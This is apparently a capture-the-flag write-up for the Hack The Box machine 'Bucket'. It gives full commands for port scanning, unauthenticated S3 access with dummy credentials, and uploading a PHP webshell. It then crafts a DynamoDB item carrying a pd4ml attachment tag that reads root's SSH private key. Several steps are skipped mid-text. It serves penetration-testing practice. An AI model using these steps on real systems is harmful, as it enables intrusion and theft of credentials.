$ nmap -p- --min-rate 4000 10.129.65.220
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-25 21:28 +08
Nmap scan report for 10.129.65.220
Host is up (0.0070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
I did a detailed scan against the web port as well:
$ nmap -p 80 -sC -sV --min-rate 4000 10.129.65.220
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-25 21:29 +08
Nmap scan report for 10.129.65.220
Host is up (0.0065s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1
We can add bucket.htb to our /etc/hosts file to visit the web application.
Web Enum -> S3 Bucket Shell Upload
The website looked to be a custom platform:
When I looked through the page source, I could see that there was a subdomain present:
It seems that the website uses an AWS S3 bucket to store its images. When we add the subdomain to the /etc/hosts file, the images load correctly:
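For reference, a single /etc/hosts entry covers both hostnames (the s3.bucket.htb name is the endpoint used below); assuming the target IP from the scan:
$ echo "10.129.65.220 bucket.htb s3.bucket.htb" | sudo tee -a /etc/hosts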
S3 is AWS's object storage service, and like any other service it can be misconfigured. So far we only know that the bucket used by the web application is called adserver. However, it's unlikely that this bucket is actually listed publicly (at least I don't think so).
To enumerate it, we can use the aws CLI with the --endpoint-url flag to specify where the requests are sent (in this case, the s3.bucket.htb host rather than AWS itself).
$ sudo aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
Unable to locate credentials. You can configure credentials by running "aws configure".
It seems that we need credentials. Based on HackTricks Cloud, unauthenticated access may still be possible by configuring dummy (null) credentials:
$ sudo aws configure
AWS Access Key ID [None]: test123
AWS Secret Access Key [None]: test123
Default region name [None]:
Default output format [None]:
$ sudo aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
PRE images/
2023-08-25 21:43:04 5344 index.html
Great! We now have access to the files within the S3 bucket. We can also try writing files to it, and find that it works:
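As a rough sketch of that step (assuming the web root of bucket.htb is synced from the bucket, so an uploaded PHP file becomes reachable over HTTP; the shell.php name and one-liner webshell are just placeholders):
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ sudo aws s3 --endpoint-url http://s3.bucket.htb cp shell.php s3://adserver/
$ curl 'http://bucket.htb/shell.php?cmd=id'
From there, the webshell can be upgraded to a reverse shell as www-data.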
roy can read this. The user had a few files within their home directory:
www-data@bucket:/home/roy$ ls -la
total 28
drwxr-xr-x 3 roy roy 4096 Sep 24 2020 .
drwxr-xr-x 3 root root 4096 Sep 16 2020 ..
lrwxrwxrwx 1 roy roy 9 Sep 16 2020 .bash_history -> /dev/null
-rw-r--r-- 1 roy roy 220 Sep 16 2020 .bash_logout
-rw-r--r-- 1 roy roy 3771 Sep 16 2020 .bashrc
-rw-r--r-- 1 roy roy 807 Sep 16 2020 .profile
drwxr-xr-x 3 roy roy 4096 Sep 24 2020 project
-r-------- 1 roy roy 33 Aug 25 13:27 user.txt
The db.php file included some code for the DynamoDB instance:
This uses DynamoDB's alert table: it fetches the entry titled Ransomware and passes its HTML content to pd4ml_demo.jar to convert it into a PDF. Searching for exploits for the pd4ml.jar program spoiled the box a bit:
Anyway, reading the documentation for it pointed me to the <attachment> tags, which can embed a local file into the generated PDF.
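Based on the pd4ml documentation, the tag that attaches a local file to the generated PDF looks roughly like this (attribute names are taken from the docs and may vary by version; here it points at root's SSH key):
<pd4ml:attachment src="file:///root/.ssh/id_rsa" description="attachment" icon="PAPERCLIP"/>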
We could potentially use this as an LFI to read root's private SSH key. First, we need to find out where this app is running. Reading the Apache configuration files gave me just that:
We need to forward port 8000 to our machine. I used chisel, but you can use ssh too since we have roy's credentials. The application is also being run as root, which means that if we can exploit the LFI, we can read any file on the machine.
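If you go the ssh route, a plain local port forward is enough (assuming the app listens on 127.0.0.1:8000 on the target, as the Apache config suggested):
$ ssh -L 8000:127.0.0.1:8000 roy@bucket.htb
The application is then reachable at http://localhost:8000 from our machine.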
Next, we need to create a new table within the DynamoDB instance with title and data attributes. Afterwards, we need to insert an item into it, with title set to Ransomware and data set to our payload:
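A rough sketch of those two steps with the aws CLI (the table name alerts is an assumption and must match whatever the application queries; the same s3.bucket.htb endpoint is assumed to also serve DynamoDB; only the title key has to be declared, since non-key attributes such as data are schemaless):
$ sudo aws dynamodb create-table --table-name alerts \
    --attribute-definitions AttributeName=title,AttributeType=S \
    --key-schema AttributeName=title,KeyType=HASH \
    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
    --endpoint-url http://s3.bucket.htb
$ sudo aws dynamodb put-item --table-name alerts \
    --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><pd4ml:attachment src=\"file:///root/.ssh/id_rsa\" description=\"attachment\" icon=\"PAPERCLIP\"/></body></html>"}}' \
    --endpoint-url http://s3.bucket.htb
Once the item is in place, requesting the generated PDF from the app on port 8000 should embed root's key as an attachment in the resulting file.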